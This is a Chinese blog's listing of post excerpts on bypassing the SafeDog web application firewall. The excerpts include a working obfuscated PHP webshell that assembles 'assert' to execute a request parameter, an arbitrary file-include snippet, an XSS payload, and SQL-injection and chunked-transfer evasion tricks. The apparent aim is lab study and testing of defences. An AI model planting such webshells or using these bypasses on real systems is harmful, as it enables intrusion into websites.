2021年9月28日
webshell安全狗免杀(二)
摘要: 有一段php代码: <?php $h='f'; $$h=$_REQUEST['x']; //$$h可以理解为先解析后边这个$h,然后在进行解析,最终解析成为$f $d='CHECK'; $$d='ass'; $$d=$CHECK.'ert'; $CHECK($f); ?> 原理:参数f赋值给$h,$ 阅读全文
posted @ 2021-09-28 21:29 田家少闲月- 阅读(159) 评论(0) 推荐(0) 编辑
webshell安全狗免杀(一)
摘要: 有这样一段php代码: <?php $filename = $_GET['filename']; include($filename); ?> 定义一个变量,以get方式接收的filename参数,赋值给$filename,在调用的时候包含变量$filename,访问这样的一个文件时,会遭到WAF安 阅读全文
posted @ 2021-09-28 17:42 田家少闲月- 阅读(258) 评论(0) 推荐(0) 编辑
WAF分块传输绕过
摘要: 原理: 在头部加入 Transfer-Encoding: chunked 之后,就代表这个报文采用了分块编码。这时,post请求报文中的数据部分需要改为用一系列分块来传输。每个分块包含十六进制的长度值和数据,长度值独占一行,长度不包括它结尾的,也不包括分块数据结尾的,且最后需要用0独占一行表示结束。 阅读全文
posted @ 2021-09-28 16:21 田家少闲月- 阅读(511) 评论(0) 推荐(0) 编辑
2021年9月27日
安全狗XSS攻击绕过
摘要: 默认安全狗网站防护模块中,将XSS漏洞攻击拦截全部处于开启状态 选择漏洞平台pikachu,使用XSS模块 正常的,输入一段XSS代码(aaa'"><script>alert("222")</script>)后,会被WAF拦截 WAF检测机制默认的将诸如:alert、prompt、comfirm等弹 阅读全文
posted @ 2021-09-27 23:34 田家少闲月- 阅读(847) 评论(0) 推荐(1) 编辑
安全狗文件上传绕过
摘要: 网站安全狗(WAF)文件上传限制在网站防护模块下的漏洞防护子模块 在以上名单出现的文件类型在上传时都会被WAF拦截,但不是所有的文件类型默认都加入了检测规则,比如图片文件(.jpg),因为涉及到用户上传文件操作,在测试截断,可以手动将要限制的文件类型加入检测机制 设置后,图片上传就会被WAF限制 访 阅读全文
posted @ 2021-09-27 22:31 田家少闲月- 阅读(446) 评论(0) 推荐(0) 编辑
WAF绕过方法总结
摘要: 1.内联注释绕过 在mysql的语法中,有三种注释方法:--和#(单行注释)和/* */(多行注释)如果在/*后加惊叹号!意为/* */里的语句将被执行1' and /*!1*/=/*!1*/ # 在mysql中 /*! ....*/ 不是注释,mysql为了保持兼容,它把一些特有的仅在mysql上 阅读全文
posted @ 2021-09-27 20:58 田家少闲月- 阅读(1406) 评论(0) 推荐(0) 编辑
云WAF绕过方法
摘要: 1.云WAF绕过,需要在请求包中伪造头部信息,具体可理解为伪造IP地址,使WAF安全机制误认为是本地访问(127.0.0.1),借助BurpSuite工具来实现 2.首先在BurpSuite中安装BypassWAF插件 2.1将.jar扩展插件安装在BurpSuite中的插件扩展模块 2.2配置By 阅读全文
posted @ 2021-09-27 18:45 田家少闲月- 阅读(1623) 评论(0) 推荐(0) 编辑
WAF安全狗各项功能
摘要: 1.IP黑白名单 安全狗提供了IP黑白名单过滤规则,可添加不受安全狗限制的IP地址,也可以将IP添加至黑名单,限制访问 为白名单添加规则 在作用范围内,设置此白名单IP能够对网站进行的操作,如果IP在黑名单中,这些规则默认全部不允许, 爬虫白名单规则,如果网站想被搜索引擎爬取到,在爬虫白名单里面,要 阅读全文
posted @ 2021-09-27 12:22 田家少闲月- 阅读(434) 评论(0) 推荐(0) 编辑
WAF之安全狗安装(一)
摘要: WAF(Web Application Firewalld):web应用防火墙 WAF的分类:1.硬件WAF:绿盟、安恒、启明、创宇等等 2.软件WAF:安全狗、云锁、中间件自带的WAF模块 3.云WAF:阿里云、安全狗、创宇、安恒等等 WAF常用功能: 1.网马木马主动防御及查杀 2.流量监控 3 阅读全文
posted @ 2021-09-27 11:42 田家少闲月- 阅读(4206) 评论(0) 推荐(0) 编辑
2021年9月25日
代码审计之xhcms环境搭建
摘要: 开篇不得不说一个神奇的源代码下载网站,江湖人称站长之家,瞄一眼它的神奇之处: 它提供了多种语言的网站源代码,包含php、asp、.net等源代码,可以快速的帮助我们在windows server中搭建需要测试的网站,本篇使用的xhcms代码审计环境就是从这里薅的资源,在这激动的时刻,决定将这神奇的网 阅读全文
posted @ 2021-09-25 13:28 田家少闲月- 阅读(1836) 评论(0) 推荐(0) 编辑